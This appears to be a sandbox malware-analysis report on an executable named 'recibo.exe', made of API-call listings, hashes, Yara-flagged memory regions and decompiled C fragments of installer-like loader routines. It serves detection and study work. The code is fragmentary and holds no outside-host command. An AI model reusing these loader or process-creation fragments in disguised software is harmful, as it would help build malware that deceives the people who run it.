                                                                                  • Associated: 00000001.00000002.23383193231.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383367093.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383431506.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383724604.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383783900.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383856333.0000000000442000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383921037.0000000000469000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383984080.000000000046B000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_recibo.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseQueryValue
                                                                                  • String ID:
                                                                                  • API String ID: 3356406503-0
                                                                                  • Opcode ID: dd1b1b3d94faa584660aa564dd852358c6c0cbefcfc3417a0db06bb84b323ca4
                                                                                  • Instruction ID: 3e5dab0bbcc9b7b4348569693e39c51bc0b27c59e8ea0ed6abb05ebc10b9b344
                                                                                  • Opcode Fuzzy Hash: dd1b1b3d94faa584660aa564dd852358c6c0cbefcfc3417a0db06bb84b323ca4
                                                                                  • Instruction Fuzzy Hash: 5F116D71900219EADF14DFA4DA589AE77B4FF04345B20443BE401B62C0E7B88A45EB5D
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 69%
                                                                                  			E00401389(signed int _a4) {
                                                                                  				intOrPtr* _t6;
                                                                                  				void* _t8;
                                                                                  				void* _t10;
                                                                                  				signed int _t11;
                                                                                  				void* _t12;
                                                                                  				signed int _t16;
                                                                                  				signed int _t17;
                                                                                  				void* _t18;
                                                                                  
                                                                                  				_t17 = _a4;
                                                                                  				while(_t17 >= 0) {
                                                                                  					_t6 = _t17 * 0x1c +  *0x434f30;
                                                                                  					if( *_t6 == 1) {
                                                                                  						break;
                                                                                  					}
                                                                                  					_push(_t6); // executed
                                                                                  					_t8 = E00401434(); // executed
                                                                                  					if(_t8 == 0x7fffffff) {
                                                                                  						return 0x7fffffff;
                                                                                  					}
                                                                                  					_t10 = E0040136D(_t8);
                                                                                  					if(_t10 != 0) {
                                                                                  						_t11 = _t10 - 1;
                                                                                  						_t16 = _t17;
                                                                                  						_t17 = _t11;
                                                                                  						_t12 = _t11 - _t16;
                                                                                  					} else {
                                                                                  						_t12 = _t10 + 1;
                                                                                  						_t17 = _t17 + 1;
                                                                                  					}
                                                                                  					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
                                                                                  						 *0x433eec =  *0x433eec + _t12;
                                                                                  						SendMessageW( *(_t18 + 0x18), 0x402, MulDiv( *0x433eec, 0x7530,  *0x433ed4), 0); // executed
                                                                                  					}
                                                                                  				}
                                                                                  				return 0;
                                                                                  			}












                                                                                  APIs
                                                                                  • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                  • SendMessageW.USER32(?,00000402,00000000), ref: 004013F4
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23383250839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.23383193231.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383367093.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383431506.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383724604.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383783900.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383856333.0000000000442000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383921037.0000000000469000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383984080.000000000046B000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_recibo.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend
                                                                                  • String ID:
                                                                                  • API String ID: 3850602802-0
                                                                                  • Opcode ID: d8feea9b0bd879c8f8267a4ec85e9a32d700cac98845316580bbb569ce856791
                                                                                  • Instruction ID: f98c5e72cab4da6dd47fcf147c12dc0649e5852bd482257a86ca63d172a8b8d6
                                                                                  • Opcode Fuzzy Hash: d8feea9b0bd879c8f8267a4ec85e9a32d700cac98845316580bbb569ce856791
                                                                                  • Instruction Fuzzy Hash: 0B01F4316202209FE7094B389D05B6A3698E710319F14823FF851F65F1EA78DC029B4C
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 100%
                                                                                  			E00402434(void* __ebx) {
                                                                                  				long _t7;
                                                                                  				void* _t10;
                                                                                  				void* _t14;
                                                                                  				long _t18;
                                                                                  				intOrPtr _t20;
                                                                                  				void* _t22;
                                                                                  				void* _t23;
                                                                                  
                                                                                  				_t14 = __ebx;
                                                                                  				_t26 =  *(_t23 - 0x20) - __ebx;
                                                                                  				_t20 =  *((intOrPtr*)(_t23 - 0x2c));
                                                                                  				if( *(_t23 - 0x20) != __ebx) {
                                                                                  					_t7 = E00402E64(_t20, E00402DA6(0x22),  *(_t23 - 0x20) >> 1); // executed
                                                                                  					_t18 = _t7;
                                                                                  					goto L4;
                                                                                  				} else {
                                                                                  					_t10 = E00402DE6(_t26, 2); // executed
                                                                                  					_t22 = _t10;
                                                                                  					if(_t22 == __ebx) {
                                                                                  						L6:
                                                                                  						 *((intOrPtr*)(_t23 - 4)) = 1;
                                                                                  					} else {
                                                                                  						_t18 = RegDeleteValueW(_t22, E00402DA6(0x33));
                                                                                  						RegCloseKey(_t22);
                                                                                  						L4:
                                                                                  						if(_t18 != _t14) {
                                                                                  							goto L6;
                                                                                  						}
                                                                                  					}
                                                                                  				}
                                                                                  				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t23 - 4));
                                                                                  				return 0;
                                                                                  			}











                                                                                  APIs
                                                                                  • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 00402456
                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 0040245F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23383250839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_recibo.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseDeleteValue
                                                                                  • String ID:
                                                                                  • API String ID: 2831762973-0
                                                                                  • Opcode ID: b75d323d86fa909671316af8d9fa67dfe1c8e59de469e028d3815ce869cacf85
                                                                                  • Instruction ID: 30df5d2aec36195d54007c6df5f336708121daf1b93815cec1e8c6dbc8099d71
                                                                                  • Opcode Fuzzy Hash: b75d323d86fa909671316af8d9fa67dfe1c8e59de469e028d3815ce869cacf85
                                                                                  • Instruction Fuzzy Hash: 22F0C232A00120EBDB11ABB89B4DAED72A8AF84314F15443BE141B71C0DAFC5D01866D
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • ShowWindow.USER32(00000000,00000000), ref: 00401EFC
                                                                                  • EnableWindow.USER32(00000000,00000000), ref: 00401F07
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23383250839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_recibo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$EnableShow
                                                                                  • String ID:
                                                                                  • API String ID: 1136574915-0
                                                                                  • Opcode ID: 5ade1ed26a80a7dd8760c06c43378076533002221f41e68569be4ee1dd8de31a
                                                                                  • Instruction ID: ff95e9915c8c9942b49c08d49a5710ecdabad47c7be9b03b7ba0a01474a23479
                                                                                  • Opcode Fuzzy Hash: 5ade1ed26a80a7dd8760c06c43378076533002221f41e68569be4ee1dd8de31a
                                                                                  • Instruction Fuzzy Hash: E7E04872908211CFE705EBA4EE495AD77F4EF40325710497FE501F11D1DBB55D00965D
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 100%
                                                                                  			E00405B20(WCHAR* _a4) {
                                                                                  				struct _PROCESS_INFORMATION _v20;
                                                                                  				int _t7;
                                                                                  
                                                                                  				0x430270->cb = 0x44;
                                                                                  				_t7 = CreateProcessW(0, _a4, 0, 0, 0, 0x4000000, 0, 0, 0x430270,  &_v20); // executed
                                                                                  				if(_t7 != 0) {
                                                                                  					CloseHandle(_v20.hThread);
                                                                                  					return _v20.hProcess;
                                                                                  				}
                                                                                  				return _t7;
                                                                                  			}






                                                                                  APIs
                                                                                  • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430270,00000000,00000000), ref: 00405B49
                                                                                  • CloseHandle.KERNEL32(?), ref: 00405B56
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23383250839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_recibo.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseCreateHandleProcess
                                                                                  • String ID:
                                                                                  • API String ID: 3712363035-0
                                                                                  • Opcode ID: 4cad7792158b69fc064c933527736888f22fedd2346a68a48c9e5725d4d2403f
                                                                                  • Instruction ID: 0547baa0b497a95b6ed0e8f273b1969b1ac2c9598ef2001c301bcde660c6e2d6
                                                                                  • Opcode Fuzzy Hash: 4cad7792158b69fc064c933527736888f22fedd2346a68a48c9e5725d4d2403f
                                                                                  • Instruction Fuzzy Hash: 3EE092B4600209BFEB10AB64AE49F7B7AACEB04704F004565BA51E61A1DB78E8158A78
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 100%
                                                                                  			E0040690A(signed int _a4) {
                                                                                  				struct HINSTANCE__* _t5;
                                                                                  				signed int _t10;
                                                                                  
                                                                                  				_t10 = _a4 << 3;
                                                                                  				_t8 =  *(_t10 + 0x40a3e0);
                                                                                  				_t5 = GetModuleHandleA( *(_t10 + 0x40a3e0));
                                                                                  				if(_t5 != 0) {
                                                                                  					L2:
                                                                                  					return GetProcAddress(_t5,  *(_t10 + 0x40a3e4));
                                                                                  				}
                                                                                  				_t5 = E0040689A(_t8); // executed
                                                                                  				if(_t5 == 0) {
                                                                                  					return 0;
                                                                                  				}
                                                                                  				goto L2;
                                                                                  			}






                                                                                  APIs
                                                                                  • GetModuleHandleA.KERNEL32(?,00000020,?,0040363D,0000000B), ref: 0040691C
                                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 00406937
                                                                                    • Part of subcall function 0040689A: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068B1
                                                                                    • Part of subcall function 0040689A: wsprintfW.USER32 ref: 004068EC
                                                                                    • Part of subcall function 0040689A: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406900
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23383250839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_recibo.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                  • String ID:
                                                                                  • API String ID: 2547128583-0
                                                                                  • Opcode ID: c7c26614299f557633109f7ac2ccf4e744cd73af09153470ea8035ac80f12020
                                                                                  • Instruction ID: 98bdf7d71c6046f852b78b75196177710d0a141037308efd39b2ac7baa162fea
                                                                                  • Opcode Fuzzy Hash: c7c26614299f557633109f7ac2ccf4e744cd73af09153470ea8035ac80f12020
                                                                                  • Instruction Fuzzy Hash: 9FE0867390422066D21196745D44D7773A89B99750306443EF946F2090DB38DC31A76E
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 68%
                                                                                  			E0040602D(WCHAR* _a4, long _a8, long _a12) {
                                                                                  				signed int _t5;
                                                                                  				void* _t6;
                                                                                  
                                                                                  				_t5 = GetFileAttributesW(_a4); // executed
                                                                                  				asm("sbb ecx, ecx");
                                                                                  				_t6 = CreateFileW(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
                                                                                  				return _t6;
                                                                                  			}






                                                                                  APIs
                                                                                  • GetFileAttributesW.KERNELBASE(00000003,004030BD,C:\Users\user\Desktop\recibo.exe,80000000,00000003,?,?,?,?,?,0040387D,?), ref: 00406031
                                                                                  • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,0040387D,?), ref: 00406053
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23383250839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_recibo.jbxd
                                                                                  Similarity
                                                                                  • API ID: File$AttributesCreate
                                                                                  • String ID:
                                                                                  • API String ID: 415043291-0
                                                                                  • Opcode ID: 080dfadfdaad2818d5b04c51cfada36c475993ea7ffea5996e238fb5a0e3a6c4
                                                                                  • Instruction ID: 1030bc0f2bf25390ef9c6131bda9d6cfedcac9e68b753c15eded60bf4a570351
                                                                                  • Opcode Fuzzy Hash: 080dfadfdaad2818d5b04c51cfada36c475993ea7ffea5996e238fb5a0e3a6c4
                                                                                  • Instruction Fuzzy Hash: 5ED09E31254201AFEF098F20DE16F2E7BA2EB94B04F11552CB786941E0DAB15C199B15
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 100%
                                                                                  			E00406008(WCHAR* _a4) {
                                                                                  				signed char _t3;
                                                                                  				signed char _t7;
                                                                                  
                                                                                  				_t3 = GetFileAttributesW(_a4); // executed
                                                                                  				_t7 = _t3;
                                                                                  				if(_t7 != 0xffffffff) {
                                                                                  					SetFileAttributesW(_a4, _t3 & 0x000000fe);
                                                                                  				}
                                                                                  				return _t7;
                                                                                  			}

                                                                                  APIs
                                                                                  • GetFileAttributesW.KERNELBASE(?,?,00405C0D,?,?,00000000,00405DE3,?,?,?,?), ref: 0040600D
                                                                                  • SetFileAttributesW.KERNEL32(?,00000000), ref: 00406021
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23383250839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.23383193231.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383367093.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383431506.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383724604.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383783900.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383856333.0000000000442000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383921037.0000000000469000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383984080.000000000046B000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_recibo.jbxd
                                                                                  Similarity
                                                                                  • API ID: AttributesFile
                                                                                  • String ID:
                                                                                  • API String ID: 3188754299-0
                                                                                  • Opcode ID: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                                                                                  • Instruction ID: c979a2e86073268fb5c10017c0603d576bb262e7e1663e1e1b2ee048d1a5e24b
                                                                                  • Opcode Fuzzy Hash: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                                                                                  • Instruction Fuzzy Hash: 34D012725041316FC2102728EF0C89BBF55EF643717014B35F9A5A22F0CB304C638A98
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 100%
                                                                                  			E00405AEB(WCHAR* _a4) {
                                                                                  				int _t2;
                                                                                  
                                                                                  				_t2 = CreateDirectoryW(_a4, 0); // executed
                                                                                  				if(_t2 == 0) {
                                                                                  					return GetLastError();
                                                                                  				}
                                                                                  				return 0;
                                                                                  			}

                                                                                  APIs
                                                                                  • CreateDirectoryW.KERNELBASE(?,00000000,00403520,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00405AF1
                                                                                  • GetLastError.KERNEL32 ref: 00405AFF
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23383250839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.23383193231.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383367093.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383431506.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383724604.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383783900.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383856333.0000000000442000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383921037.0000000000469000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383984080.000000000046B000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_recibo.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateDirectoryErrorLast
                                                                                  • String ID:
                                                                                  • API String ID: 1375471231-0
                                                                                  • Opcode ID: a5afa482e644e9a10fedfab033ae5dbb8931bf23a9e1c5533d9f8c1a63861871
                                                                                  • Instruction ID: 33feed20cbbf131019f18849f7ccc9358209a8d33535326e0157453b6049084a
                                                                                  • Opcode Fuzzy Hash: a5afa482e644e9a10fedfab033ae5dbb8931bf23a9e1c5533d9f8c1a63861871
                                                                                  • Instruction Fuzzy Hash: 1BC04C30204501AED6105B609E48B177AA4DB50741F16843D6146E41E0DA789455EE2D
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • LoadLibraryA.KERNELBASE(?,C9BF8E65,?,02CB291E), ref: 02CC361E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23385776867.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_2cb0000_recibo.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: LibraryLoad
                                                                                  • String ID:
                                                                                  • API String ID: 1029625771-0
                                                                                  • Opcode ID: 37face338ecd1506397839e1169b48b927123e56932522a29a8d547f959b454e
                                                                                  • Instruction ID: 18319f25aa391684d636c959a0a9dbdafaa2d768530e7df197c29414902ff5d1
                                                                                  • Opcode Fuzzy Hash: 37face338ecd1506397839e1169b48b927123e56932522a29a8d547f959b454e
                                                                                  • Instruction Fuzzy Hash: F7515C76A043999FCF319E28DC547DA7BA2EF55310FA5815DDC899B300D3318E85CB50
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 19%
                                                                                  			E71542B98(void* __ecx, intOrPtr _a4) {
                                                                                  				signed int _v8;
                                                                                  				void* _t28;
                                                                                  				void* _t29;
                                                                                  				void* _t33;
                                                                                  				void* _t37;
                                                                                  				void* _t40;
                                                                                  				void* _t45;
                                                                                  				void* _t49;
                                                                                  				signed int _t56;
                                                                                  				void* _t61;
                                                                                  				void* _t70;
                                                                                  				intOrPtr _t72;
                                                                                  				signed int _t77;
                                                                                  				intOrPtr _t79;
                                                                                  				intOrPtr _t80;
                                                                                  				void* _t81;
                                                                                  				void* _t87;
                                                                                  				void* _t88;
                                                                                  				void* _t89;
                                                                                  				void* _t90;
                                                                                  				intOrPtr _t93;
                                                                                  				intOrPtr _t94;
                                                                                  
                                                                                  				if( *0x71545050 != 0 && E71542ADB(_a4) == 0) {
                                                                                  					 *0x71545054 = _t93;
                                                                                  					if( *0x7154504c != 0) {
                                                                                  						_t93 =  *0x7154504c;
                                                                                  					} else {
                                                                                  						E715430C0(E71542AD5(), __ecx);
                                                                                  						 *0x7154504c = _t93;
                                                                                  					}
                                                                                  				}
                                                                                  				_t28 = E71542B09(_a4);
                                                                                  				_t94 = _t93 + 4;
                                                                                  				if(_t28 <= 0) {
                                                                                  					L9:
                                                                                  					_t29 = E71542AFD();
                                                                                  					_t72 = _a4;
                                                                                  					_t79 =  *0x71545058;
                                                                                  					 *((intOrPtr*)(_t29 + _t72)) = _t79;
                                                                                  					 *0x71545058 = _t72;
                                                                                  					E71542AF7();
                                                                                  					_t33 = CreateFileA(??, ??, ??, ??, ??, ??, ??); // executed
                                                                                  					 *0x71545034 = _t33;
                                                                                  					 *0x71545038 = _t79;
                                                                                  					if( *0x71545050 != 0 && E71542ADB( *0x71545058) == 0) {
                                                                                  						 *0x7154504c = _t94;
                                                                                  						_t94 =  *0x71545054;
                                                                                  					}
                                                                                  					_t80 =  *0x71545058;
                                                                                  					_a4 = _t80;
                                                                                  					 *0x71545058 =  *((intOrPtr*)(E71542AFD() + _t80));
                                                                                  					_t37 = E71542AE9(_t80);
                                                                                  					_pop(_t81);
                                                                                  					if(_t37 != 0) {
                                                                                  						_t40 = E71542B09(_t81);
                                                                                  						if(_t40 > 0) {
                                                                                  							_push(_t40);
                                                                                  							_push(E71542B14() + _a4 + _v8);
                                                                                  							_push(E71542B1E());
                                                                                  							if( *0x71545050 <= 0 || E71542ADB(_a4) != 0) {
                                                                                  								_pop(_t88);
                                                                                  								_pop(_t45);
                                                                                  								__eflags =  *((intOrPtr*)(_t88 + _t45)) - 2;
                                                                                  								if(__eflags == 0) {
                                                                                  								}
                                                                                  								asm("loop 0xfffffff5");
                                                                                  							} else {
                                                                                  								_pop(_t89);
                                                                                  								_pop(_t49);
                                                                                  								 *0x7154504c =  *0x7154504c +  *(_t89 + _t49) * 4;
                                                                                  								asm("loop 0xffffffeb");
                                                                                  							}
                                                                                  						}
                                                                                  					}
                                                                                  					_t107 =  *0x71545058;
                                                                                  					if( *0x71545058 == 0) {
                                                                                  						 *0x7154504c = 0;
                                                                                  					}
                                                                                  					E71542B42(_t107, _a4,  *0x71545034,  *0x71545038);
                                                                                  					return _a4;
                                                                                  				}
                                                                                  				_push(E71542B14() + _a4);
                                                                                  				_t56 = E71542B1A();
                                                                                  				_v8 = _t56;
                                                                                  				_t77 = _t28;
                                                                                  				_push(_t68 + _t56 * _t77);
                                                                                  				_t70 = E71542B26();
                                                                                  				_t87 = E71542B22();
                                                                                  				_t90 = E71542B1E();
                                                                                  				_t61 = _t77;
                                                                                  				if( *((intOrPtr*)(_t90 + _t61)) == 2) {
                                                                                  					_push( *((intOrPtr*)(_t70 + _t61)));
                                                                                  				}
                                                                                  				_push( *((intOrPtr*)(_t87 + _t61)));
                                                                                  				asm("loop 0xfffffff1");
                                                                                  				goto L9;
                                                                                  			}

                                                                                  APIs
                                                                                  • CreateFileA.KERNELBASE(00000000), ref: 71542C57
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23409278912.0000000071541000.00000020.00000001.01000000.00000004.sdmp, Offset: 71540000, based on PE: true
                                                                                  • Associated: 00000001.00000002.23409236416.0000000071540000.00000002.00000001.01000000.00000004.sdmp
                                                                                  • Associated: 00000001.00000002.23409345991.0000000071544000.00000002.00000001.01000000.00000004.sdmp
                                                                                  • Associated: 00000001.00000002.23409401287.0000000071546000.00000002.00000001.01000000.00000004.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_71540000_recibo.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateFile
                                                                                  • String ID:
                                                                                  • API String ID: 823142352-0
                                                                                  • Opcode ID: cb0ad8b792a502ae9893d8d686dbd6a1e5e1c85eecfc0a4bbe610fccb0b2fab5
                                                                                  • Instruction ID: 6c630356ae003f7ba292b9858b7adb89b5c5ecd9d4d4a0612357b07e0d7e32b8
                                                                                  • Opcode Fuzzy Hash: cb0ad8b792a502ae9893d8d686dbd6a1e5e1c85eecfc0a4bbe610fccb0b2fab5
                                                                                  • Instruction Fuzzy Hash: F7410276918229EFDB2EDFA6F880B5D37B4EB84354F319826ED09C7100CA389485DBD1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • LoadLibraryA.KERNELBASE(?,C9BF8E65,?,02CB291E), ref: 02CC361E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23385776867.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_2cb0000_recibo.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: LibraryLoad
                                                                                  • String ID:
                                                                                  • API String ID: 1029625771-0
                                                                                  • Opcode ID: 19088090fb3a2902f090ea455ec16274e27d1372d1dded36d83efa177560aeaa
                                                                                  • Instruction ID: beeb854c8506f7a68c7d6953c679a6ba48686b2ca777ea71259aa73e420f4c2b
                                                                                  • Opcode Fuzzy Hash: 19088090fb3a2902f090ea455ec16274e27d1372d1dded36d83efa177560aeaa
                                                                                  • Instruction Fuzzy Hash: 65418B71A493C99BDF329E389CA53DA3BA25F66210FAC809ECCC98B202D3314745C761
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23385776867.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_2cb0000_recibo.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 935be49347ca6176df46040b7f56174dc148eef8efb261aeef4fd38cc13824cc
                                                                                  • Instruction ID: 94e24846da0597d166d06eee8410aa1209e2d1208dad187a3e45cb6d7f9b35bf
                                                                                  • Opcode Fuzzy Hash: 935be49347ca6176df46040b7f56174dc148eef8efb261aeef4fd38cc13824cc
                                                                                  • Instruction Fuzzy Hash: 8F11AAEE9045C807C72B4439C5262D06F91EF8E324F180DCBDE48DFBA5C622CA478751
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • LoadLibraryA.KERNELBASE(?,C9BF8E65,?,02CB291E), ref: 02CC361E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23385776867.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_2cb0000_recibo.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: LibraryLoad
                                                                                  • String ID:
                                                                                  • API String ID: 1029625771-0
                                                                                  • Opcode ID: b201d74623750afd21ebaf4adc862907ca40abb3fff01d0cc2c5364385ce810c
                                                                                  • Instruction ID: 3294b86cc47b795fedbf1c5e32618ac5ba65059f54e93f5e25e018ac082cd4d2
                                                                                  • Opcode Fuzzy Hash: b201d74623750afd21ebaf4adc862907ca40abb3fff01d0cc2c5364385ce810c
                                                                                  • Instruction Fuzzy Hash: 06114C74A00299DFCB35AE349D683DE37A5AF1A350F94806EEC4CCB300E3718B449B50
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 70%
                                                                                  			E0040167B() {
                                                                                  				int _t7;
                                                                                  				void* _t13;
                                                                                  				void* _t15;
                                                                                  				void* _t20;
                                                                                  
                                                                                  				_t18 = E00402DA6(0xffffffd0);
                                                                                  				_t16 = E00402DA6(0xffffffdf);
                                                                                  				E00402DA6(0x13);
                                                                                  				_t7 = MoveFileW(_t4, _t5); // executed
                                                                                  				if(_t7 == 0) {
                                                                                  					if( *((intOrPtr*)(_t20 - 0x28)) == _t13 || E00406873(_t18) == 0) {
                                                                                  						 *((intOrPtr*)(_t20 - 4)) = 1;
                                                                                  					} else {
                                                                                  						E004062FD(_t15, _t18, _t16);
                                                                                  						_push(0xffffffe4);
                                                                                  						goto L5;
                                                                                  					}
                                                                                  				} else {
                                                                                  					_push(0xffffffe3);
                                                                                  					L5:
                                                                                  					E00401423();
                                                                                  				}
                                                                                  				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t20 - 4));
